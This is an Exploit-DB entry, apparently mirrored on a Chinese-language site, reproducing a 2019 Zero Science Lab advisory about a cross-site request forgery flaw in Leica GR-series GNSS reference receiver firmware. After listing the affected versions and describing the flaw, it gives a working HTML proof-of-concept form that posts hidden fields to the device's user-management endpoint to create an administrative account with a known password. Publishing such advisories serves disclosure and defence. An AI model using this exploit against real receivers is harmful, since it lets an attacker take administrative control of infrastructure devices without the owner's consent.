Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 – Cross-Site Request Forgery

  • 作者: LiquidWorm
    日期: 2019-01-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46090/
  • <--
    
    Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 Cross-Site Request Forgery
    
    
    Vendor: Leica Geosystems AG
    Product web page: https://www.leica-geosystems.com
    Affected version: 4.30.063
    4.20.232
    4.11.606
    3.22.1818
    3.10.1633
    2.62.782
    1.00.395
    
    Summary: The Leica GR10 is the next generation GNSS reference station receiver
    that combines the latest state-of-the-art technologies with a streamlined
    'plug and play' workflow. Designed for a wide variety of GNSS reference station
    applications, the Leica GR10 offers new levels of simplicity, reliability and
    performance.
    
    Desc: The application interface allows users to perform certain actions via
    HTTP requests without performing any validity checks to verify the requests.
    This can be exploited to perform certain actions with administrative privileges
    if a logged-in user visits a malicious web site.
    
    Tested on: BarracudaServer.com (WindowsCE)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2019-5502
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php
    
    
    18.12.2018
    
    -->
    
    
    <html>
    <body>
     <form action="http://192.168.1.17/config/config_UserManagementPostBackHelper.lsp" method="POST">
     <input type="hidden" name="txtHelpPage" value="config_changeuser" />
     <input type="hidden" name="txtUsername" value="testingus" />
     <input type="hidden" name="txtPassword" value="12345678" />
     <input type="hidden" name="txtConfirmPassword" value="12345678" />
     <input type="hidden" name="webRole" value="3" />
     <input type="hidden" name="ftpRole" value="2" />
     <input type="hidden" name="TxtOperationMode" value="2" />
     <input type="hidden" name="txtEditedUser" value="" />
     <input type="hidden" name="userId" value="nil" />
     <input type="submit" value="Init" />
     </form>
    </body>
    </html>